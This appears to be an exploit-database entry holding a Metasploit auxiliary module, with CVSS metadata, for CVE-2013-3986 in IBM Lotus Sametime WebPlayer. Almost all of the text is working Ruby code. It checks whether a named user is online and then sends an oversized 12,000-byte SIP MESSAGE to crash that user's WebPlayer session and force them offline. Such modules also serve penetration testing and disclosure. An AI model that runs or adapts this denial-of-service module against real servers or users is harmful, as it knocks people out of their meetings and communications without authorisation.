IBM Lotus Sametime WebPlayer Denial of Service

2024-08-3100:00:00

Chris John Riley, kicks4kittens, metasploit.com

packetstormsecurity.com

ibm lotus sametime

denial of service

webplayer

specific users

flaw

version 8.5.2.1392

dos condition

CVSS2

4.3

Attack Vector

NETWORK

Attack Complexity

MEDIUM

Authentication

NONE

Confidentiality Impact

NONE

Integrity Impact

NONE

Availability Impact

PARTIAL

AV:N/AC:M/Au:N/C:N/I:N/A:P

AI Score

7.1

Confidence

Low

JSON

`##  
# This module requires Metasploit: https://metasploit.com/download  
# Current source: https://github.com/rapid7/metasploit-framework  
##  
  
class MetasploitModule < Msf::Auxiliary  
include Msf::Exploit::Remote::Tcp  
include Msf::Auxiliary::Dos  
  
def initialize(info = {})  
super(update_info(info,  
'Name' => 'IBM Lotus Sametime WebPlayer DoS',  
'Description' => %q{  
This module exploits a known flaw in the IBM Lotus Sametime WebPlayer  
version 8.5.2.1392 (and prior) to cause a denial of service condition  
against specific users. For this module to function the target user  
must be actively logged into the IBM Lotus Sametime server and have  
the Sametime Audio Visual browser plug-in (WebPlayer) loaded as a  
browser extension. The user should have the WebPlayer plug-in active  
(i.e. be in a Sametime Audio/Video meeting for this DoS to work correctly.  
},  
'Author' =>  
[  
'Chris John Riley', # Vulnerability discovery  
'kicks4kittens' # Metasploit module  
],  
'License' => MSF_LICENSE,  
'Actions' =>  
[  
['DOS',  
{  
'Description' => 'Cause a Denial Of Service condition against a connected user'  
}  
],  
['CHECK',  
{  
'Description' => 'Checking if targeted user is online'  
}  
]  
],  
'DefaultAction' => 'DOS',  
'References' =>  
[  
[ 'CVE', '2013-3986' ],  
[ 'OSVDB', '99552' ],  
[ 'BID', '63611'],  
[ 'URL', 'http://www-01.ibm.com/support/docview.wss?uid=swg21654041' ],  
[ 'URL', 'http://xforce.iss.net/xforce/xfdb/84969' ]  
],  
'DisclosureDate' => '2013-11-07'))  
  
register_options(  
[  
Opt::RPORT(5060),  
OptAddress.new('RHOST', [true, 'The Sametime Media Server']),  
OptString.new('SIPURI', [  
true,  
'The SIP URI of the user to be targeted',  
'<target_email_address>@<sametime_media_server_FQDN>'  
]),  
OptInt.new('TIMEOUT', [ true, 'Set specific response timeout', 0])  
])  
  
end  
  
def setup  
# cleanup SIP target to ensure it's in the correct format to use  
@sipuri = datastore['SIPURI']  
if @sipuri[0, 4].downcase == "sip:"  
# remove sip: if present in string  
@sipuri = @sipuri[4, @sipuri.length]  
end  
if @sipuri[0, 12].downcase == "webavclient-"  
# remove WebAVClient- if present in string  
@sipuri = @sipuri[12, @sipuri.length]  
end  
end  
  
def run  
# inform user of action currently selected  
print_status("Action: #{action.name} selected")  
  
# CHECK action  
if action.name == 'CHECK'  
print_status("Checking if user #{@sipuri} is online")  
if check_user  
print_good("User online")  
else  
print_status("User offline")  
end  
return  
end  
  
# DOS action  
print_status("Checking if user #{@sipuri} is online")  
check_result = check_user  
  
if check_result == false  
print_error("User is already offline... Exiting...")  
return  
end  
  
# only proceed if action is DOS the target user is  
# online or the CHECKUSER option has been disabled  
print_status("Targeting user: #{@sipuri}...")  
dos_result = dos_user  
  
if dos_result  
print_good("User is offline, DoS was successful")  
else  
print_error("User is still online")  
end  
  
end  
  
def dos_user  
length = 12000 # enough to overflow the end of allocated memory  
msg = create_message(length)  
res = send_msg(msg)  
  
if res.nil?  
vprint_good("User #{@sipuri} is no responding")  
return true  
elsif res =~ /430 Flow Failed/i  
vprint_good("DoS packet successful. Response received (430 Flow Failed)")  
vprint_good("User #{@sipuri} is no longer responding")  
return true  
elsif res =~ /404 Not Found/i  
vprint_error("DoS packet appears successful. Response received (404 Not Found)")  
vprint_status("User appears to be currently offline or not in a Sametime video session")  
return true  
elsif res =~ /200 OK/i  
vrint_error("#{peer} - DoS packet unsuccessful. Response received (200)")  
vrint_status("#{peer} - Check user is running an effected version of IBM Lotus Sametime WebPlayer")  
return false  
else  
vprint_status("Unexpected response")  
return true  
end  
end  
  
# used to check the user is logged into Sametime and after DoS to check success  
def check_user  
length = Rex::Text.rand_text_numeric(2) # just enough to check response  
msg = create_message(length)  
res = send_msg(msg)  
  
# check response for current user status - common return codes  
if res.nil?  
vprint_error("No response")  
return false  
elsif res =~ /430 Flow Failed/i  
vprint_good("User #{@sipuri} is no longer responding (already DoS'd?)")  
return false  
elsif res =~ /404 Not Found/i  
vprint_error("User #{@sipuri} is currently offline or not in a Sametime video session")  
return false  
elsif res =~ /200 OK/i  
vprint_good("User #{@sipuri} is online")  
return true  
else  
vprint_error("Unknown server response")  
return false  
end  
end  
  
def create_message(length)  
# create SIP MESSAGE of specified length  
vprint_status("Creating SIP MESSAGE packet #{length} bytes long")  
  
source_user = Rex::Text.rand_text_alphanumeric(rand(8)+1)  
source_host = Rex::Socket.source_address(datastore['RHOST'])  
src = "#{source_host}:#{datastore['RPORT']}"  
cseq = Rex::Text.rand_text_numeric(3)  
message_text = Rex::Text.rand_text_alphanumeric(length.to_i)  
branch = Rex::Text.rand_text_alphanumeric(7)  
  
# setup SIP message in the correct format expected by the server  
data = "MESSAGE sip:WebAVClient-#{@sipuri} SIP/2.0" + "\r\n"  
data << "Via: SIP/2.0/TCP #{src};branch=#{branch}.#{"%.8x" % rand(0x100000000)};rport;alias" + "\r\n"  
data << "Max-Forwards: 80\r\n"  
data << "To: sip:WebAVClient-#{@sipuri}" + "\r\n"  
data << "From: sip:#{source_user}@#{src};tag=70c00e8c" + "\r\n"  
data << "Call-ID: #{rand(0x100000000)}@#{source_host}" + "\r\n"  
data << "CSeq: #{cseq} MESSAGE" + "\r\n"  
data << "Content-Type: text/plain;charset=utf-8" + "\r\n"  
data << "User-Agent: #{source_user}\r\n"  
data << "Content-Length: #{message_text.length}" + "\r\n\r\n"  
data << message_text  
  
return data  
end  
  
def timing_get_once(s, length)  
if datastore['TIMEOUT'] and datastore['TIMEOUT'] > 0  
return s.get_once(length, datastore['TIMEOUT'])  
else  
return s.get_once(length)  
end  
end  
  
def send_msg(msg)  
begin  
s = connect  
# send message and store response  
s.put(msg + "\r\n\r\n") rescue nil  
# read response  
res = timing_get_once(s, 25)  
if res == "\r\n"  
# retry request  
res = timing_get_once(s, 25)  
end  
return res  
rescue ::Rex::ConnectionRefused  
print_status("Unable to connect")  
return nil  
rescue ::Errno::ECONNRESET  
print_good("DoS packet successful, host not responding.")  
return nil  
rescue ::Rex::HostUnreachable, ::Rex::ConnectionTimeout  
print_status("Couldn't connect")  
return nil  
ensure  
# disconnect socket if still open  
disconnect if s  
end  
end  
end  
`